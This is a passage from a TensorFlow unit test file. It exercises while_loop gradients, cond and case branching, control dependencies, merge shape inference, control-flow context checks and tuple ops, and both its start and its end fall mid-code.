one = ops.convert_to_tensor(1.0, name="one")
c = lambda x: math_ops.less(x, n)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(constant_op.constant(True),
lambda: math_ops.square(x),
lambda: math_ops.subtract(x, one))
# pylint: enable=undefined-variable
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
r = sess.run(r, feed_dict={v: 2.0})
self.assertAllClose(1024.0, r)
@test_util.disable_control_flow_v2("b/116283162 (shape_invariants)")
def testWhileGrad_Concat(self):
with self.cached_session() as sess:
x = variable_scope.get_variable("x", initializer=[[1., 2.]])
i0 = constant_op.constant(0)
h0 = array_ops.zeros([0, 2])
def condition(i, _):
return i < 2
def body(i, h):
return i + 1, array_ops.concat([h, x], 0)
_, h = control_flow_ops.while_loop(
condition, body, [i0, h0],
[i0.get_shape(), tensor_shape.TensorShape([None, 2])])
s = math_ops.reduce_sum(h)
sess.run(variables.global_variables_initializer())
optimizer = gradient_descent.GradientDescentOptimizer(0.01)
op = optimizer.minimize(s)
sess.run(op)
self.assertAllClose([[0.98000002, 1.98000002]], sess.run(x))
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
def testWhileWithRefsWithGradients_1(self):
with self.cached_session() as sess:
x = variables.VariableV1(0.)._ref() # pylint: disable=protected-access
i = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 10)
self.assertEqual(x.dtype, dtypes.float32_ref)
def body(i, x):
self.assertEqual(x.dtype, dtypes.float32_ref)
return [i + 1, gen_array_ops.ref_identity(x)]
r = control_flow_ops.while_loop(c, body, [i, x], parallel_iterations=5)
grad_ys = [variables.VariableV1(73)._ref()] # pylint: disable=protected-access
grad = gradients_impl.gradients([r[1]], [x], grad_ys=grad_ys)
variables.global_variables_initializer().run()
self.assertEqual(r[0].dtype, dtypes.int32)
self.assertEqual(r[1].dtype, dtypes.float32_ref)
value_i, value_x, value_x_grad = sess.run(r + grad)
self.assertEqual(10, value_i)
self.assertEqual(0, value_x)
self.assertEqual(73, value_x_grad)
@test_util.disable_control_flow_v2("b/116282023 (IndexedSlices)")
def testWhileGrad_IndexedSlices(self):
with self.cached_session():
values = constant_op.constant([2.0, 4.0], name="values")
indices = constant_op.constant([0, 3], name="indices")
shape = constant_op.constant([10], name="dense_shape")
i = constant_op.constant(0)
x = ops.IndexedSlices(values, indices, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [
i + 1,
ops.IndexedSlices(x.values * 2.0, x.indices, x.dense_shape)
]
_, r = control_flow_ops.while_loop(c, b, [i, x])
r = gradients_impl.gradients(r.values, values)[0]
self.assertAllClose(np.array([1024.0, 1024.0]), r.eval())
@test_util.disable_control_flow_v2("b/116328420 (SparseTensor)")
def testWhileGrad_SparseTensor(self):
with self.cached_session():
values = constant_op.constant([2.0, 4.0], name="values")
indices = constant_op.constant(
[[0], [3]], dtype=dtypes.int64, name="indices")
shape = constant_op.constant([10], dtype=dtypes.int64, name="dense_shape")
i = constant_op.constant(0)
x = sparse_tensor.SparseTensor(indices, values, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [
i + 1,
sparse_tensor.SparseTensor(x.indices, x.values * 2.0, x.dense_shape)
]
_, r = control_flow_ops.while_loop(c, b, [i, x])
r = gradients_impl.gradients(r.values, values)[0]
self.assertAllClose(np.array([1024.0, 1024.0]), r.eval())
@test_util.disable_control_flow_v2("b/115920078 (gradients)")
def testCallGradInLoop(self):
with self.cached_session() as sess:
i0 = constant_op.constant(0)
params = constant_op.constant(5.0)
params_1 = math_ops.square(params)
def c(i, _):
return i < 10
def b(i, x):
data = constant_op.constant([1.0, 2.0, 3.0])
data = math_ops.multiply(data, params_1)
x1 = x + gradients_impl.gradients(data, params)[0]
return i + 1, x1
output_grad = control_flow_ops.while_loop(
c, b, [i0, constant_op.constant(0.0)])
self.assertAllClose(600.0, sess.run(output_grad)[1])
@test_util.disable_control_flow_v2(
"b/116255781 (flat_args), b/115660901 (TensorArray)")
def testWhileAndTensorArray(self):
with self.cached_session() as sess:
param = constant_op.constant(2.0)
n0 = constant_op.constant(0)
y0 = constant_op.constant([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], name="elems")
def c(i, _):
return i < 10
def b(i, y):
return [
i + 1,
functional_ops.map_fn(lambda x: math_ops.multiply(x, param), y)
]
r = control_flow_ops.while_loop(c, b, [n0, y0], parallel_iterations=1)
r = gradients_impl.gradients(r, param)[0]
self.assertAllClose(107520.0, sess.run(r))
def testWhileGrad_StopGrad(self):
with self.cached_session():
x = constant_op.constant(3.0, name="x")
y = constant_op.constant(2.0, name="y")
c = lambda x, y: math_ops.less(x, 100.0)
def b(x, y):
y1 = math_ops.square(y)
x1 = math_ops.add(math_ops.square(x), y1)
return x1, y1
rx, ry = control_flow_ops.while_loop(c, b, [x, y])
r = gradients_impl.gradients(rx, y)[0]
self.assertEqual(136.0, r.eval())
r = gradients_impl.gradients(ry, y)[0]
self.assertEqual(32.0, r.eval())
r = gradients_impl.gradients(array_ops.stop_gradient(rx), y)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(array_ops.stop_gradient(ry), y)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(
array_ops.stop_gradient(math_ops.square(rx)), y)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(
array_ops.stop_gradient(math_ops.add(rx, ry)), x)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(
array_ops.stop_gradient(math_ops.add(rx, ry)), y)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(math_ops.add(rx, ry), y)[0]
self.assertEqual(168.0, r.eval())
r = gradients_impl.gradients(
math_ops.add(rx, array_ops.stop_gradient(ry)), y)[0]
self.assertEqual(136.0, r.eval())
r = gradients_impl.gradients(
math_ops.add(array_ops.stop_gradient(rx), ry), y)[0]
self.assertEqual(32.0, r.eval())
def testWhileGrad_StopGradInside(self):
with self.cached_session():
x = constant_op.constant(3.0, name="x")
y = constant_op.constant(2.0, name="y")
c = lambda x, y: math_ops.less(x, 100.0)
def b(x, y):
y1 = array_ops.stop_gradient(math_ops.square(y))
x1 = math_ops.add(math_ops.square(x), y1)
return x1, y1
rx, _ = control_flow_ops.while_loop(c, b, [x, y])
r = gradients_impl.gradients(rx, y)[0]
self.assertAllClose(0.0, r.eval())
r = gradients_impl.gradients(rx, x)[0]
self.assertAllClose(156.0, r.eval())
def testWhileGrad_StopGradInsideNoShape(self):
with self.cached_session() as sess:
x = array_ops.placeholder(dtypes.float32)
y = array_ops.placeholder(dtypes.float32)
c = lambda x, y: math_ops.less(math_ops.reduce_sum(x), 100.0)
def b(x, y):
y1 = array_ops.stop_gradient(math_ops.square(y, name="stopped"))
x1 = math_ops.add(math_ops.square(x), y1)
return x1, y1
rx, _ = control_flow_ops.while_loop(c, b, [x, y])
r = gradients_impl.gradients(rx, y)[0]
feed_dict = {x: [3.0, 4.0], y: [2.0, 3.0]}
self.assertAllClose([0.0, 0.0], sess.run(r, feed_dict=feed_dict))
r = gradients_impl.gradients(rx, x)[0]
self.assertAllClose([156.0, 400.0], sess.run(r, feed_dict=feed_dict))
name = "gradients/while/stopped_grad"
all_ops = x.graph.get_operations()
self.assertFalse(any([name in op.name for op in all_ops]))
@test_util.disable_control_flow_v2("b/116255781 (flat args)")
def testWhileGradGradFail(self):
theta = variables.Variable(initial_value=1.)
def fn(prev, x):
return prev + x * theta
result = functional_ops.scan(fn, np.array([1., 2., 3.], dtype=np.float32))
grad_theta = gradients_impl.gradients(result, theta)
with self.assertRaisesRegexp(TypeError, "Second-order gradient"):
gradients_impl.gradients(grad_theta, theta)
grad_theta_stopped = array_ops.stop_gradient(grad_theta)
gradients_impl.gradients(grad_theta_stopped, theta)
def testStopGradOnWhileGrad(self):
with self.cached_session():
x = constant_op.constant(2.0, name="x")
y = constant_op.constant(2.0, name="y")
c = lambda x: math_ops.less(x, 100.0)
b = lambda x: math_ops.multiply(x, y)
rx = control_flow_ops.while_loop(c, b, [x])
rg = gradients_impl.gradients(rx, y)[0]
rg = array_ops.stop_gradient(rg)
r = math_ops.add(math_ops.square(y), rx)
r = math_ops.add(r, rg)
r = gradients_impl.gradients(r, y)[0]
self.assertEqual(388.0, r.eval())
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
def testWhileGradientWithNontrainablePath1(self):
q = variables.Variable([7., 8.])
def cond(_, y):
del y
return False
def body(x, _):
return x, math_ops.cast(x, dtypes.float32) + math_ops.reduce_sum(q)
_, y = control_flow_ops.while_loop(cond, body, (math_ops.argmin(q), 0.))
dy_dq, = gradients_impl.gradients(y, q)
self.assertIsNotNone(dy_dq)
with self.cached_session() as sess:
sess.run(q.initializer)
self.assertAllClose([0., 0.], sess.run(dy_dq))
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
def testWhileGradientWithNontrainablePath2(self):
q = variables.Variable([7., 8.])
def cond(_, y):
return math_ops.equal(y, 0.)
def body(x, _):
zero = constant_op.constant(0, dtype=dtypes.int64)
return zero, math_ops.cast(x, dtypes.float32) + math_ops.reduce_sum(q)
_, y = control_flow_ops.while_loop(cond, body, (math_ops.argmin(q), 0.))
dy_dq, = gradients_impl.gradients(y, q)
self.assertIsNotNone(dy_dq)
with self.cached_session() as sess:
sess.run(q.initializer)
self.assertAllClose([1., 1.], sess.run(dy_dq))
@test_util.disable_control_flow_v2("b/115920078 (gradients)")
def testIssue16504(self):
c = constant_op.constant(np.arange(100), dtype=dtypes.float32)
w = variables.Variable(
initial_value=np.ones(100), dtype=dtypes.float32) / 100
k = variables.Variable(0, dtype=dtypes.int32)
chg_w = constant_op.constant(np.inf, dtype=dtypes.float32)
def cond(k, _, chg_w):
return math_ops.logical_and(k < 10, chg_w > 1e-3)
def body(k, w, chg_w):
grad, = gradients_impl.gradients(-math_ops.reduce_sum(w * c), w)
w_n = w * math_ops.exp(-0.1 * grad)
w_n /= math_ops.reduce_sum(w_n)
chg_w = (
math_ops.reduce_sum(math_ops.abs(w_n - w)) / math_ops.reduce_sum(
math_ops.abs(w)))
return k + 1, w_n, chg_w
_, w, _ = control_flow_ops.while_loop(cond, body, [k, w, chg_w])
grad, = gradients_impl.gradients(w, c)
self.assertIsNotNone(grad)
@test_util.disable_control_flow_v2("b/116270461 (resource)")
def testStopGradMultiFlows(self):
with self.cached_session():
def body(i, y, r):
x = variable_scope.get_variable(
"x",
shape=(),
dtype=dtypes.float32,
initializer=init_ops.ones_initializer())
y *= x
return [i + 1, y, r + math_ops.reduce_sum(y)]
i0 = constant_op.constant(0)
y0 = array_ops.ones(5)
r0 = constant_op.constant(0.0)
cond = lambda i, y, r: i < 1
_, _, r = control_flow_ops.while_loop(
cond, body, [i0, y0, r0], back_prop=True)
vars_ = variables.global_variables()
grads = linalg_ops.norm(gradients_impl.gradients(r, vars_)[0])
z = math_ops.add(r, array_ops.stop_gradient(math_ops.reduce_sum(grads)))
result = gradients_impl.gradients(z, vars_)[0]
variables.global_variables_initializer().run()
self.assertEqual(5.0, result.eval())
def testOneValueCond(self):
with self.cached_session():
c = array_ops.placeholder(dtypes.int32, shape=[])
one = ops.convert_to_tensor(1, name="one")
two = ops.convert_to_tensor(2, name="two")
p = math_ops.greater_equal(c, 1)
i = control_flow_ops.cond(p, lambda: one, lambda: two)
self.assertTrue(isinstance(i, ops.Tensor))
# True case: c = 2 is >= 1
self.assertEqual([1], i.eval(feed_dict={c: 2}))
# False case: c = 0 is not >= 1
self.assertEqual([2], i.eval(feed_dict={c: 0}))
def testExampleCond(self):
with self.cached_session():
x = ops.convert_to_tensor([-2.0, 2.0], name="x")
d = array_ops.placeholder(dtypes.int32, shape=[])
def l2():
return math_ops.sqrt(math_ops.reduce_sum(math_ops.square(x)))
def l1():
return math_ops.reduce_sum(math_ops.abs(x))
i = control_flow_ops.cond(math_ops.equal(d, 2), l2, l1)
self.assertAllClose(4.0, i.eval(feed_dict={d: 1}))
self.assertAllClose(2.0 * math.sqrt(2), i.eval(feed_dict={d: 2}))
@test_util.disable_control_flow_v2(
"b/112477618 (Operation returned from cond)")
def testCase(self):
with self.cached_session():
x = constant_op.constant(1)
y = constant_op.constant(2)
z = constant_op.constant(3)
f1 = lambda: constant_op.constant(17)
f2 = lambda: constant_op.constant(23)
f3 = lambda: constant_op.constant(-1)
r1 = control_flow_ops.case(
{
x < y: f1,
x > z: f2
}, default=f3, exclusive=True)
self.assertAllEqual(r1.eval(), 17)
r2 = control_flow_ops.case([(y > z, f1), (y > x, f2)], default=f3)
self.assertAllEqual(r2.eval(), 23)
      # Duplicate predicates are allowed; the first matching branch is selected.
r3 = control_flow_ops.case([(x < y, f1), (x < y, f2)], default=f3)
self.assertAllEqual(r3.eval(), 17)
      # Duplicate matching predicates raise an error when exclusive=True.
r4 = control_flow_ops.case(
[(x < y, f1), (x < y, f2)], default=f3, exclusive=True)
with self.assertRaisesOpError("Input error:"):
r4.eval()
# Check that the default is called if none of the others are
r5 = control_flow_ops.case({x > y: f1}, default=f3)
self.assertAllEqual(r5.eval(), -1)
ran_once = [False, False, False]
def break_run_twice(ix):
def _break():
ran_once[ix] = True
return constant_op.constant(ix)
return _break
# Should not fail - each conditional gets called exactly once
# except default. Default gets called twice: once to create an
# empty output and once for the actual cond switch.
r6 = control_flow_ops.case(
[(x < y, break_run_twice(0)), (x > y, break_run_twice(1))],
default=lambda: constant_op.constant(2))
self.assertAllEqual(r6.eval(), 0)
@test_util.disable_control_flow_v2(
"b/112477618 (Operation returned from cond)")
def testCaseSideEffects(self):
with self.cached_session() as sess:
v0 = variables.Variable(-1)
v1 = variables.Variable(-1)
v2 = variables.Variable(-1)
a = lambda: control_flow_ops.with_dependencies([state_ops.assign(v0, 0)], 0)
b = lambda: control_flow_ops.with_dependencies([state_ops.assign(v1, 1)], 1)
c = lambda: control_flow_ops.with_dependencies([state_ops.assign(v2, 2)], 2)
x = constant_op.constant(1)
y = constant_op.constant(2)
r0 = control_flow_ops.case(
((x < y, a), (x > y, b)), default=c, exclusive=True)
r1 = control_flow_ops.case(
((x > y, a), (x < y, b)), default=c, exclusive=True)
r2 = control_flow_ops.case(
((x > y, a), (x > y, b)), default=c, exclusive=True)
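      # Each evaluation below should run exactly one branch's assign; the other variables stay at -1.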
variables.global_variables_initializer().run()
self.assertAllEqual(sess.run([v0, v1, v2]), [-1] * 3)
self.assertEqual(2, r2.eval())
self.assertAllEqual(sess.run([v0, v1, v2]), [-1, -1, 2])
variables.global_variables_initializer().run()
self.assertAllEqual(sess.run([v0, v1, v2]), [-1] * 3)
self.assertEqual(1, r1.eval())
self.assertAllEqual(sess.run([v0, v1, v2]), [-1, 1, -1])
variables.global_variables_initializer().run()
self.assertAllEqual(sess.run([v0, v1, v2]), [-1] * 3)
self.assertEqual(0, r0.eval())
self.assertAllEqual(sess.run([v0, v1, v2]), [0, -1, -1])
@test_util.disable_control_flow_v2("b/113324949 (ref vars)")
def testOneOpCond(self):
with self.cached_session():
v = variables.Variable(0)
c = ops.convert_to_tensor(0)
one = ops.convert_to_tensor(1)
two = ops.convert_to_tensor(2)
p = math_ops.greater_equal(c, 1)
def a():
return state_ops.assign(v, one)
def b():
return state_ops.assign(v, two)
i = control_flow_ops.cond(p, a, b)
self.assertTrue(isinstance(i, ops.Tensor))
variables.global_variables_initializer().run()
self.assertEqual(0, v.eval())
# True case: c = 2 is >= 1, v is set to 1.
self.assertEqual(1, i.eval(feed_dict={c.name: 2}))
self.assertEqual(1, v.eval())
# False case: c = 0 is not >= 1, v is set to 2.
self.assertEqual(2, i.eval(feed_dict={c.name: 0}))
self.assertEqual(2, v.eval())
def testWithOpsDependencies(self):
with self.cached_session() as sess:
v = variables.VariableV1(0.0)
c = constant_op.constant(10)
# Fetching v directly will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
sess.run([c, v])
# Use a control dependency to ensure init_variable is run
# while asking for c
real_v = control_flow_ops.with_dependencies(
name="real_tensor",
output_tensor=v._ref(), # pylint: disable=protected-access
dependencies=[v.initializer])
c_val, real_v_val = sess.run([c, real_v])
      # Ensure the fetched value of 'c' is unchanged.
self.assertAllEqual(10, c_val)
# Ensure that 'v' is initialized
self.assertAllClose(0.0, real_v_val)
def testWithTensorDependencies(self):
with self.cached_session():
v = variables.VariableV1(0.0)
c1 = constant_op.constant(10)
c2 = constant_op.constant(20)
# c1_with_init_v depends on the init op for v
c1_with_init_v = control_flow_ops.with_dependencies(
name="c1_with_init_v", output_tensor=c1, dependencies=[v.initializer])
# c2_with_c1 depends on the value of c1_with_init_v
c2_with_c1_dep = control_flow_ops.with_dependencies(
name="c2_with_c1_dep",
output_tensor=c2,
dependencies=[c1_with_init_v])
# Fetching v directly will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v.eval()
# Get the value of 'c2_with_c1_dep', which should cause 'v'
# to be initialized.
self.assertAllEqual(20, c2_with_c1_dep.eval())
# Ensure that 'v' is initialized
self.assertAllClose(0.0, v.eval())
def testWithIndexedSlicesDependencies(self):
with self.cached_session():
v = variables.VariableV1(
np.array([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]]).astype(np.float32))
v_at_1 = ops.IndexedSlices(v, constant_op.constant([1]))
gather_v_at_1 = array_ops.gather(v_at_1.values, v_at_1.indices)
v_at_1_after_init = control_flow_ops.with_dependencies([v.initializer],
v_at_1)
gather_v_at_1_after_init = array_ops.gather(v_at_1_after_init.values,
v_at_1_after_init.indices)
# Fetching gather_v_at_1 will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
gather_v_at_1.eval()
# Getting gather_v_at_1_after_init will work, and initialize v.
self.assertAllEqual([[10.0, 11.0]], gather_v_at_1_after_init.eval())
# Double check that 'v' is initialized
self.assertAllClose([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]], v.eval())
def testDependenciesDevice(self):
with ops.Graph().as_default():
# device set on tensor => same device on dep.
with ops.device("/job:ps"):
vd = variables.VariableV1([0.0])
with_vd_dep = control_flow_ops.with_dependencies([vd.initializer], vd)
self.assertTrue("/job:ps" in with_vd_dep.device)
# No device set on tensor => no device on dep.
vnod = variables.VariableV1([0.0])
with_vnod_dep = control_flow_ops.with_dependencies([vnod.initializer],
vnod)
self.assertDeviceEqual(None, with_vnod_dep.device)
# device set on tensor, default device on graph => default device on dep.
vdef = variables.VariableV1([0.0], name="vdef")
with ops.device("/job:worker/device:GPU:1"):
with_vdef_dep = control_flow_ops.with_dependencies([vdef.initializer],
vdef)
# The device is empty, but the colocation constraint is set.
self.assertDeviceEqual("", with_vdef_dep.device)
self.assertEqual([b"loc:@vdef"], with_vdef_dep.op.colocation_groups())
def testGroup(self):
with self.cached_session() as sess:
v1 = variables.VariableV1([0.0])
v2 = variables.VariableV1([1.0])
# Group init1 and init2 and run.
init = control_flow_ops.group(v1.initializer, v2.initializer)
# Fetching v1 directly will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v1.eval()
# Runs "init" before fetching v1 and v2.
init.run()
v1_val, v2_val = sess.run([v1, v2])
# Ensure that v1 and v2 are initialized
self.assertAllClose([0.0], v1_val)
self.assertAllClose([1.0], v2_val)
def testGroupEmpty(self):
op = control_flow_ops.group()
self.assertEqual(op.type, "NoOp")
self.assertEqual(op.control_inputs, [])
def testMergeShapes(self):
# All inputs unknown.
p1 = array_ops.placeholder(dtypes.float32)
p2 = array_ops.placeholder(dtypes.float32)
p3 = array_ops.placeholder(dtypes.float32)
m, index = control_flow_ops.merge([p1, p2, p3])
self.assertIs(None, m.get_shape().ndims)
self.assertEqual([], index.get_shape())
# All inputs known with different ranks.
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[1, 2, 3])
m, index = control_flow_ops.merge([p1, p2])
self.assertIs(None, m.get_shape().ndims)
self.assertEqual([], index.get_shape())
# All inputs known with some dimensions different.
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[2, 1])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, None], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[None, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[2, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
# All inputs known with same dimensions.
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([1, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = array_ops.placeholder(dtypes.float32, shape=[None, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[None, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = array_ops.placeholder(dtypes.float32, shape=[None, None])
p2 = array_ops.placeholder(dtypes.float32, shape=[None, None])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, None], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
def testRefSelect(self):
index = array_ops.placeholder(dtypes.int32)
# All inputs unknown.
p1 = array_ops.placeholder(dtypes.float32)
p2 = array_ops.placeholder(dtypes.float32)
p3 = array_ops.placeholder(dtypes.float32)
v1 = variables.VariableV1(p1, validate_shape=False)
v2 = variables.VariableV1(p2, validate_shape=False)
v3 = variables.VariableV1(p3, validate_shape=False)
self.assertIs(None, v1.get_shape().ndims)
s = control_flow_ops.ref_select(index, [v1, v2, v3])
self.assertIs(None, s.get_shape().ndims)
# All inputs known but different.
v1 = variables.VariableV1([[1, 2]])
v2 = variables.VariableV1([[2], [1]])
s = control_flow_ops.ref_select(index, [v1, v2])
self.assertIs(None, s.get_shape().ndims)
# All inputs known and same.
v1 = variables.VariableV1([[1, 2]])
v2 = variables.VariableV1([[1, 2]])
s = control_flow_ops.ref_select(index, [v1, v2])
self.assertEqual([1, 2], s.get_shape())
# Possibly the same but not guaranteed.
v1 = variables.VariableV1([[1., 2.]])
p2 = array_ops.placeholder(dtypes.float32, shape=[None, 2])
v2 = variables.VariableV1(p2, validate_shape=False)
s = control_flow_ops.ref_select(index, [v1, v2])
self.assertEqual(None, s.get_shape())
def testRunLoopTensor(self):
with self.cached_session() as sess:
tensor_list = []
def condition(t):
return t < constant_op.constant(5)
def body(_):
tensor_list.append(constant_op.constant(5))
return constant_op.constant(10)
result = control_flow_ops.while_loop(condition, body,
[constant_op.constant(4)])
self.assertEqual(10, sess.run(result))
# Ensure that we cannot run a tensor that escapes the loop body
# accidentally.
with self.assertRaises(ValueError):
sess.run(tensor_list[0])
def testWhilePyFuncBasic(self):
def func(x):
return np.square(x)
with self.cached_session():
r = control_flow_ops.while_loop(
lambda i, v: i < 4,
lambda i, v: [i + 1, script_ops.py_func(func, [v], [dtypes.float32])[0]],
[constant_op.constant(0), constant_op.constant(2.0, dtypes.float32)],
[tensor_shape.unknown_shape(), tensor_shape.unknown_shape()])
self.assertEqual(r[1].eval(), 65536.0)
def testWhileFuncBasic(self):
@function.Defun(dtypes.float32)
def func(x):
return math_ops.square(math_ops.square(x))
with self.cached_session():
x = constant_op.constant(2.0, dtypes.float32)
r = control_flow_ops.while_loop(
lambda i, v: i < 2, lambda i, v: [i + 1, func(v)],
[constant_op.constant(0), x],
[tensor_shape.unknown_shape(),
tensor_shape.unknown_shape()])
self.assertEqual(r[1].eval(), 65536.0)
r = gradients_impl.gradients(r, x)[0]
self.assertEqual(r.eval(), 524288.0)
# while_v2 does not have stacks.
if not control_flow_ops.ENABLE_WHILE_V2:
self.assertEqual(
len([op for op in x.graph.get_operations() if op.type == "StackV2"
]), 1)
class ControlFlowContextCheckTest(test.TestCase):
def _getWhileTensor(self):
"""Creates and returns a tensor from a while context."""
tensor = []
def body(i):
if not tensor:
tensor.append(constant_op.constant(1))
return i + tensor[0]
control_flow_ops.while_loop(lambda i: i < 10, body, [0])
return tensor[0]
def _getCondTensor(self):
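    """Creates and returns a tensor from a cond context."""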
cond_tensor = []
def true_fn():
if not cond_tensor:
cond_tensor.append(constant_op.constant(1))
return cond_tensor[0]
control_flow_ops.cond(
math_ops.less(1, 2), true_fn, lambda: constant_op.constant(0))
return cond_tensor[0]
def testInvalidContext(self):
# Accessing a while loop tensor outside of control flow is illegal.
while_tensor = self._getWhileTensor()
with self.assertRaisesRegexp(
ValueError,
"Cannot use 'while/Const_1' as input to 'Add' because 'while/Const_1' "
"is in a while loop. See info log for more details."):
math_ops.add(1, while_tensor)
def testInvalidContextInCond(self):
# Accessing a while loop tensor in cond is illegal.
while_tensor = self._getWhileTensor()
with self.assertRaisesRegexp(
ValueError, "Cannot use 'while/Const_1' as input to 'cond/Add' because "
"'while/Const_1' is in a while loop. See info log for more details."):
# TODO(skyewm): this passes if we return while_tensor directly instead
# of using it as input to another op.
control_flow_ops.cond(
math_ops.less(1, 2), lambda: math_ops.add(1, while_tensor),
lambda: constant_op.constant(0))
def testInvalidContextInWhile(self):
# Accessing a while loop tensor in a different while loop is illegal.
while_tensor = self._getWhileTensor()
with self.assertRaisesRegexp(
ValueError,
"Cannot use 'while_1/Add' as input to 'while/Const_1' because they are "
"in different while loops. See info log for more details."):
control_flow_ops.while_loop(lambda i: i < 10,
lambda x: math_ops.add(1, while_tensor), [0])
with self.assertRaisesRegexp(
ValueError,
"Cannot use 'while_2/NextIteration' as input to 'while/Const_1' "
"because they are in different while loops. See info log for more "
"details."):
control_flow_ops.while_loop(lambda i: i < 10, lambda i: while_tensor, [0])
def testValidCondContext(self):
# Accessing a tensor from a cond context is OK (although dangerous).
cond_tensor = self._getCondTensor()
math_ops.add(1, cond_tensor)
def testValidCondContextBranches(self):
# Accessing a tensor from a cond context from the other branch's cond
# context is OK (although dangerous).
cond_tensor = []
def branch_fn():
if not cond_tensor:
cond_tensor.append(constant_op.constant(1))
return cond_tensor[0]
control_flow_ops.cond(math_ops.less(1, 2), branch_fn, branch_fn)
def testValidWhileContext(self):
# Accessing a tensor in a nested while is OK.
def body(_):
c = constant_op.constant(1)
return control_flow_ops.while_loop(lambda i: i < 3, lambda i: i + c, [0])
control_flow_ops.while_loop(lambda i: i < 5, body, [0])
def testValidNestedContexts(self):
# Accessing a tensor from a cond context in a while context, all inside an
# outer while context, is OK.
def body(_):
cond_tensor = self._getCondTensor()
# Create another cond containing the while loop for good measure
return control_flow_ops.cond(
math_ops.less(1, 2),
lambda: control_flow_ops.while_loop(lambda i: i < 3,
lambda i: i + cond_tensor, [0]),
lambda: constant_op.constant(0))
control_flow_ops.while_loop(lambda i: i < 5, body, [0])
def testInvalidNestedContexts(self):
# Accessing a tensor from a while context in a different while context, all
# inside a cond context, is illegal.
def true_fn():
while_tensor = self._getWhileTensor()
return control_flow_ops.while_loop(lambda i: i < 3,
lambda i: i + while_tensor, [0])
with self.assertRaisesRegexp(
ValueError,
"Cannot use 'cond/while_1/add' as input to 'cond/while/Const_1' because"
" they are in different while loops. See info log for more details."):
control_flow_ops.cond(
math_ops.less(1, 2), true_fn, lambda: constant_op.constant(0))
class TupleTest(test.TestCase):
def testTensors(self):
for v1_first in [True, False]:
with self.cached_session():
v1 = variables.VariableV1([1.0])
add1 = math_ops.add(
control_flow_ops.with_dependencies([v1.initializer], v1._ref()), # pylint: disable=protected-access
2.0)
v2 = variables.VariableV1([10.0])
add2 = math_ops.add(
control_flow_ops.with_dependencies([v2.initializer], v2._ref()), # pylint: disable=protected-access
20.0)
t1, _, t2 = control_flow_ops.tuple([add1, None, add2])
# v1 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v1.eval()
# v2 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v2.eval()
if v1_first:
# Getting t1 initializes v2.
self.assertAllClose([3.0], t1.eval())
self.assertAllClose([10.0], v2.eval())
else:
# Getting t2 initializes v1.
self.assertAllClose([30.0], t2.eval())
self.assertAllClose([1.0], v1.eval())
def testIndexedSlices(self):
for v1_first in [True, False]:
with self.cached_session():
v1 = variables.VariableV1(
np.array([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]]).astype(
np.float32))
v1_at_1 = ops.IndexedSlices(
control_flow_ops.with_dependencies([v1.initializer], v1._ref()), # pylint: disable=protected-access
constant_op.constant([1]))
v2 = variables.VariableV1(
np.array([[0.1, 1.1], [10.1, 11.1], [20.1, 21.1]]).astype(
np.float32))
v2_at_1 = ops.IndexedSlices(
control_flow_ops.with_dependencies([v2.initializer], v2._ref()), # pylint: disable=protected-access
constant_op.constant([1]))
st1, st2 = control_flow_ops.tuple([v1_at_1, v2_at_1])
g1 = array_ops.gather(st1.values, st1.indices)
g2 = array_ops.gather(st2.values, st2.indices)
# v1 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v1.eval()
# v2 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v2.eval()
if v1_first:
# Getting g1 initializes v2.
self.assertAllClose([[10.0, 11.0]], g1.eval())
self.assertAllClose([[0.1, 1.1], [10.1, 11.1], [20.1, 21.1]],
v2.eval())
else:
# Getting g2 initializes v1.
self.assertAllClose([[10.1, 11.1]], g2.eval())
self.assertAllClose([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]],
v1.eval())
def testAcceptTensorsAsControlInputs(self):
with self.cached_session():
